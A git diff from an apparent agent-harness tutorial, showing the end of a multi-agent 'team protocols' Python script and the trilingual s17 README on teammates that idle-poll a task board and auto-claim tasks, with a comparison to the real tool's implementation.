+ "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "create_task", + "description": "Create a task.", + "input_schema": {"type": "object", + "properties": {"subject": {"type": "string"}, + "description": {"type": "string"}, + "blockedBy": {"type": "array", + "items": {"type": 
"string"}}}, + "required": ["subject"]}}, + {"name": "list_tasks", + "description": "List all tasks.", + "input_schema": {"type": "object", "properties": {}, "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "complete_task", + "description": "Complete an in-progress task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "spawn_teammate", + "description": "Spawn a teammate agent.", + "input_schema": {"type": "object", + "properties": {"name": {"type": "string"}, + "role": {"type": "string"}, + "prompt": {"type": "string"}}, + "required": ["name", "role", "prompt"]}}, + {"name": "send_message", + "description": "Send message to a teammate.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + {"name": "check_inbox", + "description": "Check inbox for messages and protocol responses.", + "input_schema": {"type": "object", "properties": {}, "required": []}}, + {"name": "request_shutdown", + "description": "Request a teammate to shut down gracefully.", + "input_schema": {"type": "object", + "properties": {"teammate": {"type": "string"}}, + "required": ["teammate"]}}, + {"name": "submit_plan", + "description": "Ask a teammate to submit a plan for review.", + "input_schema": {"type": "object", + "properties": {"teammate": {"type": "string"}, + "plan": {"type": "string"}}, + "required": ["teammate", "plan"]}}, + {"name": "review_plan", + "description": "Approve or reject a submitted plan.", + "input_schema": {"type": "object", + "properties": { + "request_id": {"type": "string"}, + "approve": {"type": "boolean"}, + "feedback": {"type": "string"}}, + "required": ["request_id", "approve"]}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, 
"read_file": run_read, "write_file": run_write, + "create_task": run_create_task, "list_tasks": run_list_tasks, + "claim_task": run_claim_task, "complete_task": run_complete_task, + "spawn_teammate": run_spawn_teammate, + "send_message": run_send_message, "check_inbox": run_check_inbox, + "request_shutdown": run_request_shutdown, + "submit_plan": run_submit_plan, "review_plan": run_review_plan, +} + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + text = " ".join(str(m.get("content", ""))[:200] + for m in messages[-6:]).lower() + return {"has_todos": "task" in text or "todo" in text, + "has_skills": "skill" in text, + "has_team": "teammate" in text or "spawn" in text or + "inbox" in text or "protocol" in text or "shutdown" in text, + "memories": context.get("memories", "")} + + +# ── Agent Loop ── + +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + except Exception as e: + messages.append({"role": "assistant", "content": [ + {"type": "text", "text": f"[Error] {type(e).__name__}: {e}"}]}) + return + + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else "Unknown" + print(str(output)[:300]) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s16: team protocols") + print("Enter a question, press Enter to send. 
Type q to quit.\n")
+    history = []
+    context = {"has_todos": False, "has_skills": False,
+               "has_team": False, "memories": ""}
+    while True:
+        try:
+            query = input("\033[36ms16 >> \033[0m")
+        except (EOFError, KeyboardInterrupt):
+            break
+        if query.strip().lower() in ("q", "exit", ""):
+            break
+        history.append({"role": "user", "content": query})
+        agent_loop(history, context)
+        context = update_context(context, history)
+        for block in history[-1]["content"]:
+            if getattr(block, "type", None) == "text":
+                print(block.text)
+
+        # Check inbox for protocol responses
+        inbox = BUS.read_inbox("lead")
+        if inbox:
+            print(f"\n\033[33m[Inbox: {len(inbox)}]\033[0m")
+            for msg in inbox:
+                meta = msg.get("metadata", {})
+                req_id = meta.get("request_id", "")
+                msg_type = msg.get("type", "")
+                if req_id and msg_type.endswith("_response"):
+                    approve = meta.get("approve", False)
+                    match_response(msg_type, req_id, approve)
+                else:
+                    print(f"  [{msg['from']}] {msg['content'][:200]}")
+            print()
diff --git a/s16_team_protocols/images/team-protocols-overview.en.svg b/s16_team_protocols/images/team-protocols-overview.en.svg
new file mode 100644
index 000000000..d73450302
--- /dev/null
+++ b/s16_team_protocols/images/team-protocols-overview.en.svg
@@ -0,0 +1,143 @@
+[SVG diagram — "Team Protocols — Request-Response + request_id Correlation + State Machine": ① Lead sends request (BUS.send with metadata={request_id}) → ② Teammate receives and dispatches by type → ③ Teammate responds with the same request_id + approve → ④ Lead matches the response via match_response(request_id). Shared pending → approved/rejected state machine and pending_requests storage; shutdown_request and plan_approval_request reuse the same FSM, so a new protocol type is just a new msg_type.]
diff --git a/s16_team_protocols/images/team-protocols-overview.ja.svg b/s16_team_protocols/images/team-protocols-overview.ja.svg
new file mode 100644
index 000000000..106c4345a
--- /dev/null
+++ b/s16_team_protocols/images/team-protocols-overview.ja.svg
@@ -0,0 +1,141 @@
+[SVG diagram — Japanese version of the Team Protocols overview above.]
diff --git a/s16_team_protocols/images/team-protocols-overview.svg b/s16_team_protocols/images/team-protocols-overview.svg
new file mode 100644
index 000000000..5eeeba78f
--- /dev/null
+++ b/s16_team_protocols/images/team-protocols-overview.svg
@@ -0,0 +1,148 @@
+[SVG diagram — Chinese version of the Team Protocols overview above.]
diff --git a/s17_autonomous_agents/README.en.md b/s17_autonomous_agents/README.en.md
new file mode 100644
index 000000000..06f4fac4b
--- /dev/null
+++ b/s17_autonomous_agents/README.en.md
@@ -0,0 +1,237 @@
+# s17: Autonomous Agents — Check the Board, Claim
the Task + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s15 → s16 → `s17` → [s18](../s18_worktree_isolation/) → s19 + +> *"Check the board, claim the task"* — Poll when idle, work when available. +> +> **Harness layer**: Autonomy — Self-organizing teammates, no Lead assignment needed. + +--- + +## The Problem + +The restaurant kitchen is busy again. Previously Lead acted like a waiter, individually assigning orders to cooks — "Alice makes Kung Pao chicken, Bob makes fish." With 10 orders, Lead has to assign 10 times. If Alice finishes first, she waits for Lead to give her the next task. + +Real kitchens don't work that way. Orders are posted on the wall, and cooks tear off the next one when they finish. Nobody stands in the middle distributing. Lead just posts the orders. + +s16's teammates can communicate and handshake shutdowns. But each teammate waits for Lead to assign tasks — if the task board has 10 unclaimed tasks, Lead must manually assign 10 times. **This doesn't scale.** Teammates should check the task board themselves, find unclaimed tasks, claim them, then look for the next one when done. + +--- + +## The Solution + +![Autonomous Agents Overview](images/autonomous-agents-overview.en.svg) + +All s16 capabilities preserved (MessageBus, protocols, shutdown handshake, plan approval). Three additions: **idle_poll** (poll every 5 seconds when idle), **scan_unclaimed_tasks** (scan the board for unclaimed tasks), **auto-claim** (claim a task when found, no Lead involvement). 
+ +Teammate lifecycle grows from two phases to three: + +| Phase | Behavior | Exit condition | +|------|------|---------| +| WORK | inbox → LLM → tool loop | `stop_reason != tool_use` | +| IDLE | Poll inbox + task board every 5s | 60s timeout | +| SHUTDOWN | Send summary, exit | — | + +--- + +## How It Works + +### idle_poll: Idle Polling + +After completing a task, teammates don't exit — they enter the IDLE phase, checking for new work every 5 seconds: + +```python +IDLE_POLL_INTERVAL = 5 # seconds +IDLE_TIMEOUT = 60 # seconds + +def idle_poll(agent_name, messages, name, role) -> bool: + """Poll for 60s. Return True if work found, False if timeout.""" + for _ in range(IDLE_TIMEOUT // IDLE_POLL_INTERVAL): # 12 times + time.sleep(IDLE_POLL_INTERVAL) + + # ① Check inbox + inbox = BUS.read_inbox(agent_name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + return True + + # ② Scan task board + unclaimed = scan_unclaimed_tasks() + if unclaimed: + task = unclaimed[0] + claim_task(task["id"], agent_name) + messages.append({"role": "user", + "content": f"Task {task['id']}: " + f"{task['subject']}"}) + return True + + return False # 60s timeout → SHUTDOWN +``` + +Two checks are ordered by priority: inbox first (may contain protocol messages like shutdown_request), task board second. If either path finds work, return `True` and re-enter the WORK phase. + +### scan_unclaimed_tasks: Scan the Task Board + +Find tasks that are pending, unowned, and not blocked by dependencies: + +```python +def scan_unclaimed_tasks() -> list[dict]: + unclaimed = [] + for f in sorted(TASKS_DIR.glob("task_*.json")): + task = json.loads(f.read_text()) + if (task.get("status") == "pending" + and not task.get("owner") + and not task.get("blockedBy")): + unclaimed.append(task) + return unclaimed +``` + +All three conditions must be met: must be pending (not in_progress or completed), no owner (nobody claimed it), no blockedBy (not blocked by other tasks). 
The tutorial takes the first one sorted by filename; CC uses file locks to prevent multiple teammates from claiming the same task. + +### Teammate Lifecycle: WORK → IDLE → SHUTDOWN + +s16's teammates exit after finishing a task. s17 adds the IDLE phase — teammates cycle through WORK → IDLE in an outer loop: + +```python +# Outer loop: WORK → IDLE cycle +while True: + # WORK phase: inner loop (max 10 LLM calls) + for _ in range(10): + # Check inbox, handle protocol messages, call LLM, execute tools + ... + if response.stop_reason != "tool_use": + break # WORK phase ends + + # IDLE phase + found_work = idle_poll(name, messages, name, role) + if not found_work: + break # 60s timeout → SHUTDOWN + +# SHUTDOWN: send summary to Lead +BUS.send(name, "lead", summary, "result") +``` + +Key design: +- **Outer while True**: WORK and IDLE alternate until timeout +- **Inner for 10**: WORK phase has max 10 LLM call rounds (prevents infinite loops) +- **IDLE timeout 60s**: 12 polls × 5s = 60s. On timeout, send summary and exit +- **shutdown_request interrupts anytime**: Even during WORK, receiving shutdown_request in inbox stops immediately + +### Identity Re-injection + +After autoCompact (s08), a teammate's messages list may be compressed into a summary. The teammate might "forget who they are" — not knowing their name and role. On each new WORK phase entry, check: + +```python +if len(messages) <= 3: + messages.insert(0, {"role": "user", + "content": f"You are '{name}', role: {role}. " + f"Continue your work."}) +``` + +Short messages indicate compression happened, so identity info is re-injected. This is a defensive check — in real CC, context compaction preserves the system prompt, but the tutorial's simplified implementation needs manual handling. + +### Running It Together + +``` +1. Lead: "Build the backend — too many tasks, let teammates claim them" +2. Lead → create_task("Create database schema") +3. Lead → create_task("Write API routes") +4. 
Lead → create_task("Write unit tests") +5. Lead → spawn_teammate("alice", "backend", "You are a backend developer") +6. Lead → spawn_teammate("bob", "backend", "You are a backend developer") + +7. alice thread starts → WORK: no initial inbox → idle → IDLE +8. bob thread starts → WORK: no initial inbox → idle → IDLE + +9. alice IDLE 1st poll → scan_unclaimed → finds "Create database schema" +10. alice → claim_task → "Create database schema" → back to WORK +11. bob IDLE 1st poll → scan_unclaimed → finds "Write API routes" +12. bob → claim_task → "Write API routes" → back to WORK + +13. alice WORK: write_file("schema.sql", ...) → complete_task → WORK ends +14. alice IDLE → scan → "Write unit tests" → claim → WORK +15. alice WORK: write_file("test_api.py", ...) → complete_task → WORK ends +16. alice IDLE → 60s no new tasks → SHUTDOWN + +17. bob similar flow → finishes → SHUTDOWN +18. Lead check_inbox → sees alice and bob's summaries +``` + +Two teammates claiming and working in parallel. Lead only creates tasks and spawns teammates — no manual assignment. + +--- + +## Changes from s16 + +| Component | Before (s16) | After (s17) | +|------|-----------|-----------| +| Task assignment | Lead manually assigns | Teammates auto-claim | +| Teammate state | WORK or exit | WORK → IDLE (poll 60s) → SHUTDOWN | +| New functions | — | idle_poll, scan_unclaimed_tasks | +| Identity retention | System prompt only | Auto re-injection after compaction | +| Lead tools | 13 | 13 (unchanged) | +| Teammate tools | 5 | 7 (+list_tasks, claim_task) | +| Teammate exit condition | Exit after completing task | Exit only after 60s with no new task | + +--- + +## Try It Out + +```sh +cd learn-claude-code +python s17_autonomous_agents/code.py +``` + +Try this prompt: + +`Create 3 tasks on the board, then spawn alice and bob. Watch them auto-claim and work.` + +What to observe: Did teammates automatically claim unassigned tasks? Did they respect blockedBy dependency order? 
Did they auto-shutdown after idle timeout? How did task states change in the `.tasks/` directory? + +--- + +## What's Next + +Teammates are self-organizing now. But Alice and Bob both work in the same directory — Alice edits `config.py`, Bob also edits `config.py`, overwriting each other's changes. + +s18 Worktree Isolation → Each task gets its own working directory, no conflicts. + +
+Deep Dive into CC Source + +> Teaching note: This chapter's idle_poll + auto-claim mechanism is a pedagogical design, demonstrating the core idea of self-organizing agent teams. CC's actual implementation differs but shares the same goal — reducing Lead's manual assignment burden. + +### 1. CC Has No IDLE Loop — Uses idle_notification + +The tutorial's teammates actively poll the task board every 5s during IDLE. CC does the opposite: **teammates don't actively poll; they automatically go idle after completing a round of work**. + +The mechanism (`teammateMailbox.ts`): +1. Teammate completes a round of work (stop_reason != tool_use) +2. Stop hook fires → sends `idle_notification` to Lead +3. Lead receives idle_notification → knows teammate is free +4. Lead can: assign new task / do nothing / request shutdown + +### 2. Task Claiming: useTaskListWatcher + File Locks + +CC's teammates don't need scan_unclaimed_tasks — CC's `useTaskListWatcher` monitors the `.claude/tasks/` directory for changes, automatically notifying teammates when new tasks are created. Teammates see available tasks and call `TaskUpdate` to claim. + +Concurrency safety on claiming: CC uses file locks (`proper-lockfile`) to protect task files. When two teammates try to claim the same task, only the first one to acquire the lock succeeds — the second sees the status has changed. + +### 3. 
Tutorial vs CC Comparison + +| Dimension | Tutorial (s17) | CC | +|------|-------------|-----| +| Idle detection | Active polling (idle_poll 5s) | Passive notification (idle_notification) | +| Task discovery | scan_unclaimed_tasks | useTaskListWatcher (file monitoring) | +| Concurrency safety | None (teaching simplification) | proper-lockfile file locks | +| Timeout exit | 60s with no new task | No fixed timeout, Lead manually shuts down | +| Identity retention | messages length detection | Context compaction preserves system prompt | + +The tutorial's active polling model is more intuitive (readers easily understand "check every 5s"), but CC's passive notification model is more efficient (no busy-waiting). + +
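The lock-guarded claim described in section 2 can be approximated in the tutorial's own Python without extra dependencies. This is a sketch, not CC's implementation: `claim_task_locked` and the `O_EXCL` lock-file trick are illustrative stand-ins for `proper-lockfile` (a Node.js library), and the task-file fields follow this chapter's `.tasks/` examples.

```python
import json
import os
from pathlib import Path

def claim_task_locked(task_path: Path, owner: str) -> bool:
    """Atomically claim a task file: the first claimer to take the lock wins."""
    lock = task_path.with_suffix(".lock")
    try:
        # O_CREAT | O_EXCL fails if the lock file already exists,
        # i.e. another teammate is claiming this task right now.
        fd = os.open(lock, os.O_CREAT | os.O_EXCL | os.O_WRONLY)
    except FileExistsError:
        return False
    try:
        task = json.loads(task_path.read_text())
        # Re-check under the lock: status may have changed since the scan.
        if task.get("status") != "pending" or task.get("owner"):
            return False
        task["status"] = "in_progress"
        task["owner"] = owner
        task_path.write_text(json.dumps(task))
        return True
    finally:
        os.close(fd)
        lock.unlink()
```

Two teammates racing on the same `task_*.json` resolve cleanly: the loser either hits `FileExistsError` on the lock or, after acquiring it, sees `owner` already set and backs off — the "first lock wins" behavior the table above attributes to `proper-lockfile`.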
+ + diff --git a/s17_autonomous_agents/README.ja.md b/s17_autonomous_agents/README.ja.md new file mode 100644 index 000000000..34aedc2e5 --- /dev/null +++ b/s17_autonomous_agents/README.ja.md @@ -0,0 +1,237 @@ +# s17: Autonomous Agents — ボードを見て、自分で認領 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s15 → s16 → `s17` → [s18](../s18_worktree_isolation/) → s19 + +> *"ボードを見て、自分で認領"* — 空き時にポーリング、仕事があれば実行。 +> +> **Harness 層**: 自治 — チームメイトの自己組織化、Lead の割り当て不要。 + +--- + +## 課題 + +レストランの厨房がまた忙しくなった。以前は Lead がウェイターのように、注文を料理人に個別に割り当てていた — 「Alice は宮保鶏丁、Bob は酸菜魚」。10 個の注文があれば、Lead は 10 回 assign する必要がある。Alice が先に終わっても、Lead が次のタスクをくれるのを待つだけ。 + +本物の厨房はそうは動かない。注文は壁に貼られ、料理人は終わったら自分で次を剥がす。中央で分配する人はいない。Lead は注文を貼るだけでいい。 + +s16 のチームメイトは通信もシャットダウンハンドシェイクもできる。しかし各チームメイトは Lead がタスクを割り当てるのを待つ — タスクボードに 10 個の未割り当てタスクがあれば、Lead は 10 回手動で assign する必要がある。**これはスケールしない。** チームメイトは自分でタスクボードを見て、未割り当てのタスクを見つけて認領し、終わったら次を探すべきだ。 + +--- + +## ソリューション + +![Autonomous Agents Overview](images/autonomous-agents-overview.ja.svg) + +s16 の全機能を保持(MessageBus、プロトコル、シャットダウンハンドシェイク、計画承認)。3 つの追加:**idle_poll**(空き時に 5 秒ごとにポーリング)、**scan_unclaimed_tasks**(ボード上の未認領タスクをスキャン)、**自動認領**(タスクを見つけたら claim、Lead の関与不要)。 + +チームメイトのライフサイクルが 2 フェーズから 3 フェーズに: + +| フェーズ | 挙動 | 終了条件 | +|------|------|---------| +| WORK | inbox → LLM → ツールループ | `stop_reason != tool_use` | +| IDLE | 5 秒ごとに inbox + タスクボードをポーリング | 60 秒タイムアウト | +| SHUTDOWN | summary を送信して終了 | — | + +--- + +## 仕組み + +### idle_poll: 空き時ポーリング + +チームメイトはタスク完了後も終了せず、IDLE フェーズに入る — 5 秒ごとに新しい仕事がないかチェック: + +```python +IDLE_POLL_INTERVAL = 5 # seconds +IDLE_TIMEOUT = 60 # seconds + +def idle_poll(agent_name, messages, name, role) -> bool: + """Poll for 60s. 
Return True if work found, False if timeout.""" + for _ in range(IDLE_TIMEOUT // IDLE_POLL_INTERVAL): # 12 回 + time.sleep(IDLE_POLL_INTERVAL) + + # ① inbox をチェック + inbox = BUS.read_inbox(agent_name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + return True + + # ② タスクボードをスキャン + unclaimed = scan_unclaimed_tasks() + if unclaimed: + task = unclaimed[0] + claim_task(task["id"], agent_name) + messages.append({"role": "user", + "content": f"Task {task['id']}: " + f"{task['subject']}"}) + return True + + return False # 60 秒タイムアウト → SHUTDOWN +``` + +2 つのチェックは優先度順:inbox が先(shutdown_request などのプロトコルメッセージが含まれる可能性)、タスクボードが次。どちらかが仕事を見つけたら `True` を返し、WORK フェーズに戻る。 + +### scan_unclaimed_tasks: タスクボードのスキャン + +pending 状態、owner なし、依存関係によるブロックなしのタスクを見つける: + +```python +def scan_unclaimed_tasks() -> list[dict]: + unclaimed = [] + for f in sorted(TASKS_DIR.glob("task_*.json")): + task = json.loads(f.read_text()) + if (task.get("status") == "pending" + and not task.get("owner") + and not task.get("blockedBy")): + unclaimed.append(task) + return unclaimed +``` + +3 つの条件が全て必要:pending であること(in_progress や completed ではない)、owner がないこと(誰も認領していない)、blockedBy がないこと(他のタスクにブロックされていない)。チュートリアル版はファイル名順で最初のものを取得、CC はファイルロックで複数チームメイトの同時認領を防止。 + +### チームメイトライフサイクル: WORK → IDLE → SHUTDOWN + +s16 のチームメイトはタスク完了後に終了していた。s17 は IDLE フェーズを追加 — 外側ループで WORK → IDLE を繰り返す: + +```python +# 外側ループ: WORK → IDLE サイクル +while True: + # WORK フェーズ: 内側ループ(最大 10 ラウンド LLM 呼び出し) + for _ in range(10): + # inbox チェック、プロトコルメッセージ処理、LLM 呼び出し、ツール実行 + ... 
+ if response.stop_reason != "tool_use": + break # WORK フェーズ終了 + + # IDLE フェーズ + found_work = idle_poll(name, messages, name, role) + if not found_work: + break # 60 秒タイムアウト → SHUTDOWN + +# SHUTDOWN: Lead に summary を送信 +BUS.send(name, "lead", summary, "result") +``` + +主要設計: +- **外側 while True**:WORK と IDLE をタイムアウトまで交互に実行 +- **内側 for 10**:WORK フェーズは最大 10 ラウンド LLM 呼び出し(無限ループ防止) +- **IDLE タイムアウト 60 秒**:12 回ポーリング × 5 秒 = 60 秒。タイムアウト後 summary を送信して終了 +- **shutdown_request でいつでも中断可能**:WORK 中でも inbox で shutdown_request を受信したら即座に停止 + +### アイデンティティ再注入 + +autoCompact(s08)の後、チームメイトの messages リストが要約に圧縮されることがある。チームメイトが「自分が誰か忘れる」— 名前と役割がわからなくなる。新しい WORK フェーズに入るたびにチェック: + +```python +if len(messages) <= 3: + messages.insert(0, {"role": "user", + "content": f"You are '{name}', role: {role}. " + f"Continue your work."}) +``` + +メッセージが短すぎる場合、圧縮が発生したことを意味し、アイデンティティ情報を再注入。これは防御的チェック — 本物の CC では context compaction が system prompt を保持するが、チュートリアル版の簡略実装では手動処理が必要。 + +### 組み合わせて実行 + +``` +1. Lead: "バックエンドを構築 — タスクが多すぎる、チームメイトに自分で認領させよう" +2. Lead → create_task("データベース schema を作成") +3. Lead → create_task("API ルートを記述") +4. Lead → create_task("ユニットテストを記述") +5. Lead → spawn_teammate("alice", "backend", "あなたはバックエンド開発者") +6. Lead → spawn_teammate("bob", "backend", "あなたはバックエンド開発者") + +7. alice スレッド起動 → WORK: 初期 inbox なし → 空転 → IDLE +8. bob スレッド起動 → WORK: 初期 inbox なし → 空転 → IDLE + +9. alice IDLE 1 回目のポーリング → scan_unclaimed → "データベース schema を作成" を発見 +10. alice → claim_task → "データベース schema を作成" → WORK に戻る +11. bob IDLE 1 回目のポーリング → scan_unclaimed → "API ルートを記述" を発見 +12. bob → claim_task → "API ルートを記述" → WORK に戻る + +13. alice WORK: write_file("schema.sql", ...) → complete_task → WORK 終了 +14. alice IDLE → scan → "ユニットテストを記述" → claim → WORK +15. alice WORK: write_file("test_api.py", ...) → complete_task → WORK 終了 +16. alice IDLE → 60 秒新タスクなし → SHUTDOWN + +17. bob も同様の流れ → 完了 → SHUTDOWN +18. 
Lead check_inbox → alice と bob の summary を確認 +``` + +2 人のチームメイトが並行して認領・作業。Lead はタスク作成とチームメイト起動だけ — 手動割り当て不要。 + +--- + +## s16 からの変更 + +| コンポーネント | 変更前 (s16) | 変更後 (s17) | +|--------------|------------|------------| +| タスク割り当て | Lead が手動で assign | チームメイトが自動認領 | +| チームメイト状態 | WORK または終了 | WORK → IDLE(60 秒ポーリング)→ SHUTDOWN | +| 新規関数 | — | idle_poll, scan_unclaimed_tasks | +| アイデンティティ保持 | system prompt のみ | 圧縮後の自動再注入 | +| Lead ツール | 13 | 13(変更なし) | +| チームメイトツール | 5 | 7(+list_tasks, claim_task) | +| チームメイト終了条件 | タスク完了後即終了 | 60 秒新タスクなしで終了 | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s17_autonomous_agents/code.py +``` + +以下のプロンプトを試してください: + +`Create 3 tasks on the board, then spawn alice and bob. Watch them auto-claim and work.` + +観察ポイント:チームメイトは未割り当てのタスクを自動認領したか?blockedBy 依存順序を守ったか?アイドルタイムアウト後に自動シャットダウンしたか?`.tasks/` ディレクトリのタスク状態はどう変化したか? + +--- + +## 次の章 + +チームメイトが自己組織化した。しかし Alice と Bob は同じディレクトリで作業している — Alice が `config.py` を編集し、Bob も `config.py` を編集して、互いに上書きし合う。 + +s18 Worktree Isolation → 各タスクに独自の作業ディレクトリ、互いに干渉しない。 + +
+CC ソースコード深掘り + +> 教学注記:本章の idle_poll + auto-claim 機構は教学設計であり、自己組織化 Agent チームの核心思想を示している。CC の実際の実装方法は異なるが、目標は同じ — Lead の手動割り当て負担を減らすこと。 + +### 一、CC に IDLE ループはない — idle_notification を使用 + +チュートリアル版のチームメイトは IDLE 中に 5 秒ごとにタスクボードをアクティブにポーリングする。CC は逆:**チームメイトはアクティブにポーリングせず、作業ラウンド完了後に自動的にアイドル状態になる**。 + +具体的な仕組み(`teammateMailbox.ts`): +1. チームメイトが作業ラウンドを完了(stop_reason != tool_use) +2. Stop hook が発火 → Lead に `idle_notification` を送信 +3. Lead が idle_notification を受信 → チームメイトが空いていることを把握 +4. Lead は:新しいタスクを割り当て / 何もしない / シャットダウンを要求 + +### 二、タスク認領:useTaskListWatcher + ファイルロック + +CC のチームメイトは scan_unclaimed_tasks を必要としない — CC の `useTaskListWatcher` が `.claude/tasks/` ディレクトリの変化を監視し、新しいタスクが作成されると自動的にチームメイトに通知。チームメイトは利用可能なタスクを見て `TaskUpdate` を呼んで認領。 + +認領時の並行安全性:CC は `proper-lockfile` でタスクファイルを保護。2 人のチームメイトが同じタスクを同時に認領しようとした場合、最初にロックを取得した方だけが成功し、2 人目は状態が変わったことを確認。 + +### 三、チュートリアル版 vs CC 比較 + +| 次元 | チュートリアル版 (s17) | CC | +|------|-------------|-----| +| アイドル検出 | アクティブポーリング(idle_poll 5s) | パッシブ通知(idle_notification) | +| タスク発見 | scan_unclaimed_tasks | useTaskListWatcher(ファイル監視) | +| 並行安全性 | なし(教学簡略化) | proper-lockfile ファイルロック | +| タイムアウト終了 | 60 秒新タスクなし | 固定タイムアウトなし、Lead が手動でシャットダウン | +| アイデンティティ保持 | messages 長さ検出 | context compaction が system prompt を保持 | + +チュートリアル版のアクティブポーリングモデルはより直感的(読者は「5 秒ごとにチェック」を容易に理解)、しかし CC のパッシブ通知モデルはより効率的(ビジーウェイトなし)。 + +
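第二節で触れたファイルロックによる認領は、チュートリアルの Python でも追加依存なしで近似できる。以下はあくまでスケッチであり、CC の実装そのものではない(`proper-lockfile` は Node.js ライブラリ。関数名 `claim_task_locked` と `O_EXCL` ロックファイル方式は説明用の仮定。タスクファイルのフィールドは本章の `.tasks/` の例に従う):

```python
import json
import os
from pathlib import Path

def claim_task_locked(task_path: Path, owner: str) -> bool:
    """タスクファイルをアトミックに認領:最初にロックを取った者だけが成功する。"""
    lock = task_path.with_suffix(".lock")
    try:
        # O_CREAT | O_EXCL はロックファイルが既に存在すると失敗する
        # = 別のチームメイトが今まさに認領中ということ。
        fd = os.open(lock, os.O_CREAT | os.O_EXCL | os.O_WRONLY)
    except FileExistsError:
        return False
    try:
        task = json.loads(task_path.read_text())
        # ロック取得後に再確認:スキャン時点から状態が変わっている可能性がある。
        if task.get("status") != "pending" or task.get("owner"):
            return False
        task["status"] = "in_progress"
        task["owner"] = owner
        task_path.write_text(json.dumps(task))
        return True
    finally:
        os.close(fd)
        lock.unlink()
```

同じ `task_*.json` を 2 人が同時に認領しようとしても、負けた側はロック作成で `FileExistsError` になるか、ロック取得後に `owner` が設定済みと気付いて引き下がる — 上の比較表で `proper-lockfile` に帰した「先にロックを取った方が勝つ」挙動と同じ。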
+ + diff --git a/s17_autonomous_agents/README.md b/s17_autonomous_agents/README.md new file mode 100644 index 000000000..80aff5ee5 --- /dev/null +++ b/s17_autonomous_agents/README.md @@ -0,0 +1,237 @@ +# s17: Autonomous Agents — 自己看板,自己认领 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s15 → s16 → `s17` → [s18](../s18_worktree_isolation/) → s19 + +> *"自己看板,自己认领"* — 空闲时轮询,有活就干。 +> +> **Harness 层**: 自治 — 队友自组织,不依赖 Lead 分配。 + +--- + +## 问题 + +饭店厨房又忙起来了。之前 Lead 像传菜员,逐个给厨师分配订单——"Alice 做宫保鸡丁,Bob 做酸菜鱼"。10 个订单,Lead 得 assign 10 次。如果 Alice 先做完了,她就干等着 Lead 给下一个任务。 + +真正的厨房不是这样运作的。订单贴在墙上,厨师做完一个自己去撕下一个。没有人站在中间分配。Lead 只需要把订单贴上去。 + +s16 的队友能通信、能握手关机。但每个队友等 Lead 分配任务——如果任务看板上有 10 个未认领任务,Lead 得手动 assign 10 次。**这不能扩展。** 队友应该自己看任务看板,发现没人做的任务就认领,做完再找下一个。 + +--- + +## 解决方案 + +![Autonomous Agents Overview](images/autonomous-agents-overview.svg) + +s16 的全部能力保留(MessageBus、协议、关机握手、计划审批)。新增三样:**idle_poll**(空闲时每 5 秒轮询一次)、**scan_unclaimed_tasks**(扫描看板上未认领的任务)、**自动认领**(找到任务就 claim,不用 Lead 操心)。 + +队友生命周期从两阶段变成三阶段: + +| 阶段 | 行为 | 退出条件 | +|------|------|---------| +| WORK | inbox → LLM → 工具循环 | `stop_reason != tool_use` | +| IDLE | 每 5s 轮询 inbox + 任务板 | 60s 超时 | +| SHUTDOWN | 发 summary,退出 | — | + +--- + +## 工作原理 + +### idle_poll: 空闲轮询 + +队友完成当前任务后不退出,进入 IDLE 阶段——每 5 秒检查一次有没有新工作: + +```python +IDLE_POLL_INTERVAL = 5 # seconds +IDLE_TIMEOUT = 60 # seconds + +def idle_poll(agent_name, messages, name, role) -> bool: + """Poll for 60s. 
Return True if work found, False if timeout.""" + for _ in range(IDLE_TIMEOUT // IDLE_POLL_INTERVAL): # 12 次 + time.sleep(IDLE_POLL_INTERVAL) + + # ① 检查收件箱 + inbox = BUS.read_inbox(agent_name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + return True + + # ② 扫描任务看板 + unclaimed = scan_unclaimed_tasks() + if unclaimed: + task = unclaimed[0] + claim_task(task["id"], agent_name) + messages.append({"role": "user", + "content": f"Task {task['id']}: " + f"{task['subject']}"}) + return True + + return False # 60s 超时 → SHUTDOWN +``` + +两个检查按优先级排列:inbox 优先(可能包含 shutdown_request 等协议消息),任务板其次。任何一路找到工作就返回 `True`,回到 WORK 阶段。 + +### scan_unclaimed_tasks: 扫描任务看板 + +找 pending 状态、无 owner、无依赖阻塞的任务: + +```python +def scan_unclaimed_tasks() -> list[dict]: + unclaimed = [] + for f in sorted(TASKS_DIR.glob("task_*.json")): + task = json.loads(f.read_text()) + if (task.get("status") == "pending" + and not task.get("owner") + and not task.get("blockedBy")): + unclaimed.append(task) + return unclaimed +``` + +三个条件缺一不可:必须是 pending(不是 in_progress 或 completed)、没有 owner(没人认领)、没有 blockedBy(不被其他任务阻塞)。教学版按文件名排序取第一个;CC 用文件锁防止多个队友同时认领同一个任务。 + +### 队友生命周期: WORK → IDLE → SHUTDOWN + +s16 